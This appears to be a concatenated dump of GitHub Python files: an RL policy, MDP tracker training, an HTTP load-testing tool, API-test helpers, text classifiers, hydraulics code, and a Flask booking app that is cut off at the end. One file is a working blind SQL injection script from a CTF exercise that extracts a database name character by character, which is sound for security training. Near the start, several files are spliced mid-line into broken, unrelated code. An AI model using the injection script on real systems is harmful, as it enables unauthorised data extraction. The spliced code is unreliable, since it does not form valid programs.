+{"seq_id":"72006352090","text":"import torch\nimport math\nimport numpy as np\nimport os\nimport io\nimport copy\nimport ctypes\nimport random\nfrom . import basic\n\nclass NN_policy(object):\n def __init__(self,actor,epsilon):\n self.actor = copy.deepcopy(actor) \n self.epsilon = epsilon \n def inference(self,obs_list):\n with torch.no_grad():\n pos = torch.Tensor(np.vstack([obs.pos for obs in obs_list])).cuda()\n laser_data = torch.Tensor(np.vstack([obs.laser_data for obs in obs_list])).cuda()\n \n action = self.actor(pos,laser_data).cpu().numpy()\n if random.random() int:\n need = sum(nums)%p\n if need ==0:\n return 0\n print(need,\"dfscdscsd\")\n n=len(nums)\n res=n\n dic=defaultdict(int)\n dic[0]=-1\n cur= 0\n for i in range(n):\n cur=(cur+nums[i])%p\n \n if (cur-need)%p in dic:\n res = min(res,i-dic[(cur-need)%p])\n dic[cur]=i\n\n return res if res args.max_iter:\n logger.info('Max iteration exceeds')\n break\n\n if len(np.where(is_good == 0)[0]) == 0:\n\n # two pass training\n if count == args.max_pass:\n break\n else:\n count += 1\n logger.info('***pass {} finished'.format(count))\n # todo change shape from (num_train) to (num_train, 1)\n is_good = np.zeros((num_train, 1))\n is_good[is_difficult == 1] = 1\n counter = np.zeros((num_train, 1))\n t = -1\n # find a sequence to train\n while True:\n t = t + 1\n if t >= num_train:\n t = 0\n if is_good[t] == 0:\n break\n\n if args.is_text:\n logger.info('Tracking sequence {}'.format(t))\n\n dres_gt = dres_train[t]\n\n # first frame\n fr = dres_gt['fr'][0]\n identity = dres_gt['id'][0]\n\n # reset tracker : Transfer the MDP to Tracked.\n tracker.prev_state = 1\n tracker.state = 1\n tracker.target_id = identity\n\n # For LSTM tracker\n tracker.prev_frames = []\n tracker.prev_det_id = []\n\n # start tracking\n while fr <= seq_num:\n if args.is_text:\n logger.info('frame {}, state {}'.format(fr, tracker.state))\n\n # extract detection\n # todo doubt\n index = np.where(dres_det['fr'] == fr)[0]\n dres = sub(dres_det, index)\n num_det = len(dres['fr'])\n\n # inactive\n if tracker.state == 0:\n if reward == 1:\n is_good[t] = 1\n logger.info('sequence {} is good'.format(t))\n break\n\n # active\n elif tracker.state == 1:\n\n # compute overlap\n overlap, _, _ = calc_overlap(dres_gt, 0, dres, np.arange(num_det))\n ind = np.argmax(overlap)\n ov = overlap[ind]\n if args.is_text:\n logger.info('Start first frame overlap {:.2}'.format(ov))\n\n # initialize the LK tracker : Initial the target template\n tracker = lk_initialize(tracker, fr, identity, dres, ind, dres_image)\n tracker.state = 2\n tracker.streak_occluded = 0\n\n # build the dres structure\n dres_one = sub(dres, ind)\n tracker.dres = dres_one\n tracker.dres['id'] = np.array([tracker.target_id])\n tracker.dres['state'] = np.array([tracker.state])\n\n if tracker.is_lstm == 1:\n tracker = add_to_target_queue(tracker, dres_one['fr'], dres_one['id'], args.is_text)\n\n # tracker\n elif tracker.state == 2:\n tracker.streak_occluded = 0\n # todo verify mdp_value\n tracker, _, _ = mdp_value(tracker, fr, dres_image, dres, [], args)\n\n # occluded\n elif tracker.state == 3:\n tracker.streak_occluded = tracker.streak_occluded + 1\n\n # find a set of detections for association\n dres = mdp_crop_image_box(dres, dres_image['Igray'][fr - 1], tracker)\n dres, index_det, ctrack = generate_association_index(tracker, fr, dres)\n index_gt = np.where(dres_gt['fr'] == fr)[0]\n if dres_gt['covered'][index_gt] != 0:\n index_det = []\n tracker, _, f = mdp_value(tracker, fr, dres_image, dres, index_det, args)\n\n if 
not isempty(index_det):\n # compute reward\n reward, label, f, is_end = mdp_reward_occluded(fr, f, dres_image, dres_gt, dres, index_det, tracker,\n args, args.is_text, logger)\n\n # update weights if negative reward\n if reward == -1:\n tracker.f_occluded = np.vstack((tracker.f_occluded, f))\n tracker.l_occluded = np.append(tracker.l_occluded, label)\n # todo what is happening\n if args.is_sk_svm:\n tracker.svc_occluded = tracker.svc_occluded.fit(tracker.f_occluded, tracker.l_occluded)\n else:\n tracker.w_occluded = svm_train(tracker.l_occluded.tolist(), tracker.f_occluded.tolist(),\n '-c 1 -q -g 1 -b 1')\n logger.info('training examples in occluded state {}'.format(tracker.f_occluded.shape[0]))\n if is_end:\n tracker.state = 0\n\n # Transition to inactive if lost for a long time\n if tracker.streak_occluded > args.max_occlusion:\n tracker.state = 0\n if len(np.where(dres_gt['fr'] == fr)[0]) == 0:\n reward = 1\n logger.info('Target exits due to long time occlusion')\n\n # check if outside image\n if tracker.state == 2:\n _, ov, _ = calc_overlap(tracker.dres, tracker.dres['fr'].shape[0] - 1, dres_image, fr - 1)\n if ov < args.exit_threshold:\n logger.info('Target outside image by checking borders')\n tracker.state = 0\n reward = 1\n\n # try to connect recently lost target\n if not (tracker.state == 3 and tracker.prev_state == 2):\n fr = fr + 1\n\n if fr > seq_num:\n is_good[t] = 1\n logger.info('sequence {} is good'.format(t))\n counter[t] = counter[t] + 1\n if counter[t] > max_count:\n is_good[t] = 1\n is_difficult[t] = 1\n logger.info('sequence {} reached max iteration'.format(t))\n logger.info('Finish training {}'.format(seq_name))\n\n # save model\n if args.is_save:\n # save SVM\n filename = os.path.join(args.output_dir, args.name, seq_name + '_w_active')\n svm_save_model(filename, tracker.w_active)\n filename = os.path.join(args.output_dir, args.name, seq_name + '_w_occluded')\n svm_save_model(filename, tracker.w_occluded)\n w_active = tracker.w_active\n w_occluded = tracker.w_occluded\n tracker.w_active = None\n tracker.w_occluded = None\n\n filename = os.path.join(args.output_dir, args.name, seq_name + '_tracker.pkl')\n logger.info('Saving the tracker at {}'.format(filename))\n with open(filename, 'wb') as f:\n pickle.dump(tracker, f)\n tracker.w_active = w_active\n tracker.w_occluded = w_occluded\n\n return tracker\n\n\n# if __name__ == '__main__':\n# # Parse cmdline args and setup environment\n# parser = argparse.ArgumentParser(\n# 'Appearance Model',\n# formatter_class=argparse.ArgumentDefaultsHelpFormatter\n# )\n# config.add_args(parser)\n# args = parser.parse_args()\n# mdp_train()\n","repo_name":"TapanBhardwaj/MDP_Python","sub_path":"mdp_function/mdp_train.py","file_name":"mdp_train.py","file_ext":"py","file_size_in_byte":8995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9389155077","text":"import asyncio\nimport copy\nimport json\nimport os\nimport statistics\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nimport httpx\nimport toml\nimport typer\nfrom httpx._exceptions import ConnectTimeout, HTTPError, NetworkError, ReadTimeout\nfrom jinja2 import Template\nfrom tabulate import tabulate\n\nHTTP_METHODS_FUNC_MAPPING = {\n \"GET\": \"make_get_request\",\n \"POST\": \"make_post_request\",\n \"PUT\": \"make_put_request\",\n \"PATCH\": \"make_patch_request\",\n \"DELETE\": \"make_delete_request\",\n}\n\nSUCCESS = typer.style(\"success\", fg=typer.colors.GREEN, bold=True)\nERROR = typer.style(\"error\", fg=typer.colors.RED, bold=True)\nFLOW_ERROR = typer.style(\"FLOW_ERROR\", bg=typer.colors.RED, fg=typer.colors.WHITE, bold=True)\nREQUEST_INFO = typer.style(\"REQUEST_INFO\", bg=typer.colors.GREEN, fg=typer.colors.BLACK, bold=True)\n\nREQUEST_MESSAGE = \"Request {}: name={}, url={}\"\nSTART_MESSAGE = \"Start bloodaxe, number_of_concurrent_flows={}, duration={} seconds\"\nRESPONSE_DATA_CHECK_FAILED_MESSAGE = \"Failed to check response, request={}, \" \"expected data={}, received={}\"\nRESPONSE_STATUS_CODE_CHECK_FAILED_MESSAGE = (\n \"Status code check failed, request={}, \" \"expected status_code={}, received={}\"\n)\nSECONDS_MASK = \"{0:.2f}\"\nDEFAULT_TIMEOUT = 10\n\nTABLE_HEADERS = [\n \"Total success flows\",\n \"Total error flows\",\n \"Total flows\",\n \"Mean time\",\n \"Standard deviation\",\n \"Total time\",\n]\n\nHTTP_EXCEPTIONS = (HTTPError, NetworkError, ReadTimeout, ConnectTimeout)\n\napp = typer.Typer()\n\n\nclass FlowError(Exception):\n pass\n\n\n@dataclass\nclass Flow:\n duration: float = 0\n error: FlowError = None\n success: bool = True\n\n\ndef show_request_message(status, name, url):\n message = REQUEST_MESSAGE.format(status, name, url)\n typer.echo(message)\n\n\ndef replace_with_template(context, data):\n if isinstance(data, dict):\n data = json.dumps(data)\n\n template = Template(data)\n\n return template.render(**context)\n\n\nasync def make_get_request(url, timeout, params=None, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.get(url, params=params, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_get_request, exc={exc}\")\n\n return resp\n\n\nasync def make_delete_request(url, timeout, params=None, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.delete(url, params=params, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_delete_request, exc={exc}\")\n\n return resp\n\n\nasync def make_put_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.put(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_put_request, exc={exc}\")\n\n return resp\n\n\nasync def make_patch_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.patch(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_patch_request, exc={exc}\")\n\n return resp\n\n\nasync def 
make_post_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.post(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_post_request, exc={exc}\")\n\n return resp\n\n\ndef check_response_data(request_name, data, expected_data, context):\n expected_data = json.loads(replace_with_template(context, expected_data))\n error_msg = RESPONSE_DATA_CHECK_FAILED_MESSAGE.format(request_name, expected_data, data)\n\n if data != expected_data:\n raise FlowError(error_msg)\n\n\ndef check_response_status_code(request_name, status_code, expected_status_code):\n error_msg = RESPONSE_STATUS_CODE_CHECK_FAILED_MESSAGE.format(\n request_name, expected_status_code, status_code\n )\n\n if status_code != expected_status_code:\n raise FlowError(error_msg)\n\n\ndef check_response(request_name, data, status_code, context, response_check=None):\n if response_check.get(\"data\"):\n check_response_data(request_name, data, response_check[\"data\"], context)\n if response_check.get(\"status_code\"):\n check_response_status_code(request_name, status_code, response_check[\"status_code\"])\n\n\nasync def make_request(context, name, url, method, response_check=None, *args, **kwargs):\n method = method.upper()\n try:\n func = globals()[HTTP_METHODS_FUNC_MAPPING[method]] # resolve the handler function by name; avoids eval\n except KeyError:\n raise FlowError(f\"An error occurred when make_request, invalid http method={method}\")\n\n resp = await func(url, *args, **kwargs)\n data = resp.json()\n status_code = resp.status_code\n\n if response_check:\n check_response(name, data, status_code, context, response_check)\n\n return data\n\n\ndef show_metrics(flows, total_time):\n success_flows = [flow for flow in flows if flow.success]\n error_flows = [flow for flow in flows if flow.error]\n mean_time = 0\n standard_deviation = 0\n\n if len(success_flows) > 1:\n mean_time = statistics.mean([flow.duration for flow in success_flows])\n standard_deviation = statistics.stdev([flow.duration for flow in success_flows])\n\n row = [\n len(success_flows),\n len(error_flows),\n len(flows),\n SECONDS_MASK.format(round(mean_time, 2)),\n SECONDS_MASK.format(round(standard_deviation, 2)),\n SECONDS_MASK.format(round(total_time, 2)),\n ]\n\n typer.echo(\"\\n\")\n typer.echo(tabulate([row], headers=TABLE_HEADERS))\n\n\ndef from_file(file_path):\n with open(file_path) as f:\n try:\n data = json.load(f)\n except json.JSONDecodeError:\n raise ValueError(f\"Invalid json file, file={file_path}\")\n\n return data\n\n\ndef generate_request_data(context, data):\n if data.get(\"from_file\"):\n data = from_file(data.get(\"from_file\"))\n\n return json.loads(replace_with_template(context, data))\n\n\ndef generate_request_headers(context, headers):\n return json.loads(replace_with_template(context, headers))\n\n\ndef generate_request_params(context, params):\n return json.loads(replace_with_template(context, params))\n\n\ndef make_api_context(api_info):\n context = {}\n for api in api_info:\n context[api[\"name\"]] = {\"base_url\": api[\"base_url\"]}\n\n env_vars = api.get(\"envvars\", {})\n for key, value in env_vars.items():\n context[api[\"name\"]][key] = os.environ[value]\n\n return context\n\n\nasync def run_flow(toml_data, verbose):\n flow_config = copy.deepcopy(toml_data)\n context = make_api_context(flow_config.get(\"api\")) or {}\n start_flow_time = time.time()\n current_flow = Flow()\n\n for request in 
flow_config[\"request\"]:\n request[\"timeout\"] = request.get(\"timeout\") or DEFAULT_TIMEOUT\n request[\"url\"] = replace_with_template(context, request[\"url\"])\n\n if request.get(\"data\"):\n request[\"data\"] = generate_request_data(context, request[\"data\"])\n\n if request.get(\"params\"):\n request[\"params\"] = generate_request_params(context, request[\"params\"])\n\n if request.get(\"headers\"):\n request[\"headers\"] = generate_request_headers(context, request[\"headers\"])\n\n try:\n result = await make_request(context, **request)\n show_request_message(SUCCESS, request[\"name\"], request[\"url\"])\n if verbose:\n typer.secho(f\"{REQUEST_INFO}: request_name={request['name']}, response={result}\")\n except FlowError as exc:\n show_request_message(ERROR, request[\"name\"], request[\"url\"])\n current_flow.error = exc\n current_flow.success = False\n if verbose:\n typer.secho(f\"{FLOW_ERROR}: {exc}\")\n break\n\n if request.get(\"save_result\"):\n context[request[\"name\"]] = result\n\n current_flow.duration = time.time() - start_flow_time\n\n return current_flow\n\n\nasync def start(toml_data, verbose):\n flows = tuple()\n duration = toml_data[\"configs\"][\"duration\"]\n number_of_concurrent_flows = toml_data[\"configs\"][\"number_of_concurrent_flows\"]\n\n typer.secho(\n START_MESSAGE.format(number_of_concurrent_flows, duration),\n fg=typer.colors.CYAN,\n underline=True,\n bold=True,\n )\n\n start_time = time.time()\n while True:\n elapsed_seconds = time.time() - start_time\n\n if elapsed_seconds >= duration:\n break\n\n results = await asyncio.gather(\n *[run_flow(toml_data, verbose) for _ in range(number_of_concurrent_flows)]\n )\n\n flows += tuple(results)\n\n show_metrics(flows, elapsed_seconds)\n\n\n@app.command()\ndef main(flow_config_file: Path, verbose: bool = False):\n try:\n toml_data = toml.load(flow_config_file)\n except (TypeError, toml.TomlDecodeError):\n typer.echo(\"Invalid toml file\")\n else:\n asyncio.run(start(toml_data, verbose))\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"rfunix/bloodaxe","sub_path":"bloodaxe.py","file_name":"bloodaxe.py","file_ext":"py","file_size_in_byte":9585,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"}
+{"seq_id":"40613851937","text":"# -*- coding:utf-8 -*-\n\nimport re\nimport random\n\nfrom utils import testcase_handler\n\n\n# @ResponseDependMulti('A-002','industryNo','data')\n# @PayloadDepend('A-001','industryNam')\n\n\ndef ResponseDependMulti(case_no, keyword, dto):\n caseinfo = testcase_handler.get_case_info(case_no=case_no) # fetch the complete record for this case_no\n responsebody = eval(str(caseinfo[13]))\n if '#' not in dto:\n for data in responsebody[dto]:\n return data[str(keyword)]\n elif '#' in dto:\n jsonpath = re.split('#', dto)\n print(jsonpath)\n for i in range(len(jsonpath)):\n print(responsebody)\n if type(responsebody) == list:\n responsebody = responsebody[0][jsonpath[i]]\n else:\n responsebody = responsebody[jsonpath[i]]\n # print(responsebody[str(keyword)])\n # print(responsebody)\n if type(responsebody) == list:\n responsebody = responsebody[0][keyword]\n print(responsebody)\n return responsebody\n else:\n return responsebody[keyword]\n else:\n pass\n\n\ndef PayloadDepend(case_no, keyword):\n caseinfo = testcase_handler.get_case_info(case_no=case_no) # fetch the complete record for this case_no\n requestbody = eval(str(caseinfo[17]))\n return requestbody[keyword]\n\n\n# @RString('u','10')\n# re.search('@(.+?)\\(', str(\"@RString('u','10')\")).group(1)\n# print(re.search('@(.+?)\\(', str(\"@RString('u','10')\")).group(1))\ndef RString(flag, length):\n u_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n l_str = 'abcdefghijklmnopqrstuvwxyz'\n m_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\n if flag == 'u':\n \"\"\"uppercase letters of the given length\"\"\"\n random_str = ''\n for i in range(int(length)):\n random_str += u_str[random.randint(0, len(u_str) - 1)]\n # print(random_str)\n return random_str\n elif flag == 'l':\n \"\"\"lowercase letters of the given length\"\"\"\n random_str = ''\n for i in range(int(length)):\n random_str += l_str[random.randint(0, len(l_str) - 1)]\n # print(random_str)\n return random_str\n elif flag == 'm':\n \"\"\"mixed-case letters of the given length\"\"\"\n random_str = ''\n for i in range(int(length)):\n random_str += m_str[random.randint(0, len(m_str) - 1)]\n # print(random_str)\n return random_str\n\n\ndef RNum(length):\n randstart = 10 ** (length - 1)\n randend = (10 ** length) - 1\n return random.randint(randstart, randend)\n\n\ndef test():\n pass\n","repo_name":"Bikankan/ApiAutomatic-1","sub_path":"utils/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"75132183130","text":"import requests\n\nurl=\"http://ea48910f-376f-4f65-9b03-20a70766520e.node3.buuoj.cn/index.php\"\n# url=\"http://1a80bd91-ddfa-4db6-bd93-198413227815.node3.buuoj.cn/index.php?stunum=if(ascii(substr(database(),1,1))=55,1,2)\"\npayload=\"if(ascii(substr(database(),{},1))={},1,2)\"\n\n# if(ascii(substr(database(),1,1))=54,1,2)\n# if(ascii(substr(select database(),1,1))=55,1,2)\ncharacters=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_\"\nif __name__ == \"__main__\":\n result=\"\"\n for i in range(1,25):\n for ac in range(33,125):\n params={\n \"stunum\":payload.format(i,ac)\n }\n response=requests.get(url=url,params=params)\n # response=requests.get(url=url)\n # print(response.text)\n if(\"Hi admin\" in response.text):\n result+=chr(ac)\n # print(ac)\n print(result)","repo_name":"lurenxiao1998/CTFOJ","sub_path":"[WUSTCTF2020]颜值成绩查询/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"41883448548","text":"from flask import request, jsonify\nfrom chat.api import api_bp\nimport pickle\nimport re\n\n\nclass TextSpamClassifier():\n def __init__(self) -> None:\n with open('notebooks/spam_filter/model_spam.pickle', 'rb') as handle:\n self.model = pickle.load(handle)\n with open('notebooks/spam_filter/vectorizer_spam.pickle',\n 'rb') as handle:\n self.vectorizer = pickle.load(handle)\n\n def __preprocess_text(self, text):\n text = text.lower()\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n text = text.strip()\n text = text.split()\n text = ' '.join(list(filter(lambda x: x not in ['', ' '], text)))\n return text\n\n def predict_proba(self, X):\n val = self.__preprocess_text(X)\n val = self.vectorizer.transform([val])\n prob = self.model.predict_proba(val)[0][1]\n return prob\n\n\nclass TextProfanityClassifier():\n def __init__(self) -> None:\n with open('notebooks/profanity_filter/model_profanity.pickle',\n 'rb') as handle:\n self.model = pickle.load(handle)\n with open('notebooks/profanity_filter/vectorizer_profanity.pickle',\n 'rb') as handle:\n self.vectorizer = pickle.load(handle)\n\n def __preprocess_text(self, text):\n text = text.lower()\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n text = text.strip()\n text = text.split()\n text = ' '.join(list(filter(lambda x: x not in ['', ' '], text)))\n return text\n\n def predict_proba(self, X):\n val = self.__preprocess_text(X)\n val = self.vectorizer.transform([val])\n # model.predict returns a class label (0 or 1) here, not a probability\n prob = self.model.predict(val)[0]\n return prob\n\n\n@api_bp.route('/text-validate', methods=['POST'])\ndef text_chat_validate():\n message = request.form.get('message')\n tsc = TextSpamClassifier()\n tpc = TextProfanityClassifier()\n spam_text = \"Not a spam!\"\n prof_text = \"No profane!\"\n # score the message once with each model instead of re-running them per branch\n spam_prob = tsc.predict_proba(message)\n prof_label = tpc.predict_proba(message)\n if spam_prob > 0.8:\n spam_text = \"Highly spam!\"\n elif spam_prob > 0.6:\n spam_text = \"Slightly spam!\"\n elif spam_prob > 0.4:\n spam_text = \"Less spam!\"\n elif spam_prob > 0.2:\n spam_text = \"I don't think spam!\"\n\n if prof_label != 0:\n prof_text = \"Profane text!\"\n\n return jsonify({\n \"spam_text\": f\"{spam_text}\",\n \"prof_text\": f\"{prof_text}\",\n \"status\": \"success\"\n })\n","repo_name":"indic-amigo-akademi/moraliser","sub_path":"chat/api/chat_route.py","file_name":"chat_route.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4269888887","text":"#!/usr/bin/python\nimport random\n# openpyxl is used below as oxl for load_workbook; the star imports may already\n# provide it, but importing explicitly keeps the name defined\nimport openpyxl as oxl\ntry:\n from cParameters import *\n from cReadInpLifespan import *\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) + \"\\\\.site_packages\\\\riverpy\\\\\")\n import fGlobal as fGl\n import config\n import cThresholdDirector as cT\n import cDefinitions\nexcept:\n print(\"ExceptionERROR: Cannot find package files (/.site_packages/riverpy/).\")\n\ntry:\n import arcpy\nexcept:\n print(\"ExceptionERROR: arcpy is not available (check license connection?)\")\ntry:\n from arcpy.sa import *\nexcept:\n print(\"ExceptionERROR: Spatial Analyst (arcpy.sa) is not available (check license?)\")\n\n\n# note: written like a bound method (first argument self); the caller is expected\n# to supply an object that carries logger, features, etc.\ndef create_bed_shear(self, condition1):\n self.features = cDefinitions.FeatureDefinitions()\n self.feature_reader = cDefinitions.FeatureReader()\n self.thresh_xlsx = config.xlsx_thresholds\n\n try:\n self.wb = oxl.load_workbook(filename=self.thresh_xlsx, read_only=True, data_only=True)\n wb_open = True\n except:\n wb_open = False\n self.logger.info(\"ERROR: Could not open threshold_values.xlsx.\")\n try:\n if wb_open:\n self.ws = self.wb['thresholds']\n else:\n self.ws = \"\"\n except:\n self.logger.info(\"ERROR: Could not find sheet \\'thresholds\\' in threshold_values.xlsx.\")\n\n self.thresh_row_dict = self.feature_reader.get_rows()\n unit_cell = self.ws.cell(row=self.thresh_row_dict['unit'], column=5).value\n\n print(unit_cell)\n __n__ = 0.0473934\n\n if unit_cell == \"U.S. customary\":\n self.ft2m = config.ft2m\n self.ft2in = 12 # (in/ft) conversion factor for U.S. customary units\n self.n = __n__ / 1.49 # (s/ft^(1/3)) global Manning's n where k =1.49 converts to US customary\n self.n_label = \"s/ft^(1/3)\"\n self.rho_w = 1.937 # slug/ft^3\n else:\n self.ft2m = 1.0\n self.ft2in = 1 # (in/ft) dummy conversion factor in SI\n self.n = __n__ # (s/m^(1/3)) global Manning's n\n self.n_label = \"s/m^(1/3)\"\n self.rho_w = 1000 # kg/m^3\n\n self.g = 9.81 / self.ft2m # (ft/s2) gravity acceleration\n self.s = 2.68 # (--) relative grain density (ratio of rho_s and rho_w)\n self.sf = 0.99\n dir_tb = config.dir2conditions + condition1 + \"\\\\tb\\\\\"\n dir_ts = config.dir2conditions + condition1 + \"\\\\ts\\\\\"\n\n os.mkdir(dir_ts)\n os.mkdir(dir_tb)\n\n h = FlowDepth(condition1)\n u = FlowVelocity(condition1)\n grains = GrainSizes(condition1)\n if str(grains.raster).__len__() > 1:\n tx_raster_list = []\n for i in range(0, h.raster_names.__len__()):\n if (str(u.rasters[i]).__len__() > 1) and (str(h.rasters[i]).__len__() > 1):\n _q_ = fGl.read_Q_str(h.raster_names[i], prefix='h')\n _name__ = 'tb' + fGl.write_Q_str(_q_) + '.tif'\n name__ = 'ts' + fGl.write_Q_str(_q_) + '.tif'\n _ras__ = Square(u.rasters[i] / (5.75 * Log10(12.2 * h.rasters[i] / (2 * 2.2 * grains.raster))))\n arcpy.CopyRaster_management(_ras__, dir_tb + _name__)\n __ras__ = (self.rho_w * _ras__) / (self.rho_w * self.g * (self.s - 1) * grains.raster)\n arcpy.CopyRaster_management(__ras__, dir_ts + name__)\n tx_raster_list.append(__ras__)\n\n","repo_name":"RiverArchitect/program","sub_path":"LifespanDesign/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"}
+{"seq_id":"7808298572","text":"import simPyon as sim\nimport numpy as np\n# To run this file must be in the same folder as \n\ndef main():\n\t# Load up some voltages\n\tvolts = np.load('volts_de_e_1_330_3.npy').item()\n\n\t# Load Simion command environment\n\timap = sim.simion()\n\n\t# manually input voltages\n\timap.define_volts()\n\n\t# Fast Adjust voltages \n\timap.fast_adjust(elec_dict = volts) # if volts was loaded\n\timap.fast_adjust() # if voltages were input manually\n\n\t# Define Line distributions for source\n\tline_1 = [np.array([260,156,0]),np.array([270,106,0])]\n\tline_2 = [np.array([99.4,133,0])+10,np.array([158.9,116.8,0])+10]\n\n\t# Print particle source description\n\tprint(imap.parts())\n\n\t# Change distribution type\n\t# imap.parts.pos = sim.particles.source('gaussian')\n\n\t# Change Distribution inputs\n\timap.parts.pos.dist_vals['first'] = line_1[0]\n\timap.parts.pos.dist_vals['last'] = line_1[1]\n\n\t# Fly Particles with source line_1 and store in data_line_1\n\tdata_line_1 = imap.fly(10000).data\n\n\t# Change source location to line_2 and fly\n\timap.parts.pos.dist_vals['first'] = line_2[0]\n\timap.parts.pos.dist_vals['last'] = line_2[1]\n\tdata_line_2 = imap.fly(10000).data\n\n\t# Show Simion Geometry and last flown particles\n\timap.show()\n\t# enable measurement mode\n\timap.show(measure = True)\n\n\t# Plot distributions of flown data\n\tdata_line_2.show()\n\tdata_line_1.show()\n\nif __name__ =='__main__':\n\tmain()","repo_name":"jonbowr/simPyon","sub_path":"examples/sim_init.py","file_name":"sim_init.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"}
+{"seq_id":"72118399451","text":"import datetime as dt\nfrom functools import reduce\n\nimport qrcode\nimport pdfkit\nfrom flask import render_template, redirect, url_for, flash, request\nfrom flask_login import login_required, current_user\n\nfrom . import main\nfrom .tables import ActivityTable, FacilityTable\nfrom .forms import *\nfrom ..models import *\nfrom .. import db\nfrom ..decorators import admin_required, permission_required\nfrom ..email import send_email\n\n\n@main.route('/')\ndef index():\n if current_user.is_administrator():\n return render_template('admin/index.html')\n return render_template('index.html')\n\n\n@main.route('/facility')\ndef facility():\n facilities = Facility.query.all()\n return render_template('facilities.html', facilities=facilities)\n\n\n@main.route('/facility_info/<int:id>')\ndef view_info(id):\n facility = Facility.query.filter_by(id=id).first()\n return render_template('facility_info.html', facility=facility)\n\n\n@main.route('/membership')\ndef view_membership_type():\n memberships = MembershipType.query.all()\n return render_template('membership.html', memberships=memberships)\n\n\n@main.route('/my_bookings/<int:id>')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_my_bookings(id):\n account = User.query.get_or_404(id)\n bookings = Booking.query.order_by(Booking.timestamp.desc()).filter_by(account_id=account.id).all()\n start_time = []\n end_time = []\n for booking in bookings:\n timetable = TimeManagement.query.filter_by(booking_id=booking.id).first()\n start_time.append(timetable.start_time)\n end_time.append(timetable.end_time)\n return render_template('my_booking.html', bookings=bookings)\n\n\n@main.route('/pricing_list')\ndef display_pricing_list():\n return render_template('pricing_list.html', facilities=Facility.query.all())\n\n\n@main.route('/activities/<int:id>/book', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_activity(id):\n form = BookActivityForm(activity=Activity.query.get(id))\n if form.validate_on_submit():\n return render_template('book_activity_instance.html', instance_id=form.activity_instance_id.data)\n return render_template('book_activity.html', form=form)\n\n\n@main.route('/activity-instances/<int:instance_id>/book', methods=['GET', 'POST'])\ndef book_activity_instance(instance_id):\n form = SelectPaymentForm(cards=current_user.cards)\n instance = ActivityInstance.query.get_or_404(instance_id)\n if form.validate_on_submit():\n booking = Booking(activity_instance_id=instance_id,\n status='Paid',\n user_id=current_user.id)\n db.session.add(booking)\n db.session.commit()\n return render_template('booking_success.html', booking=booking)\n return render_template('book_activity_instance.html', form=form, instance=instance)\n\n\n@main.route('/book/<int:type>', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_facility(type):\n if type == 1:\n facility = \"Swimming pool\"\n form = PoolBookingForm()\n elif type == 2:\n facility = \"Fitness room\"\n form = FitnessBookingForm()\n elif type == 3:\n facility = \"Squash courts\"\n form = SquashBookingForm()\n else:\n facility = \"Sports hall\"\n form = HallBookingForm()\n\n if form.validate_on_submit():\n activity = form.activity.data\n number = form.number.data\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n payment = form.payment.data\n\n fac = Facility.query.filter_by(name=facility).first()\n act = fac.activities.filter_by(activity_name=activity).first()\n price = 
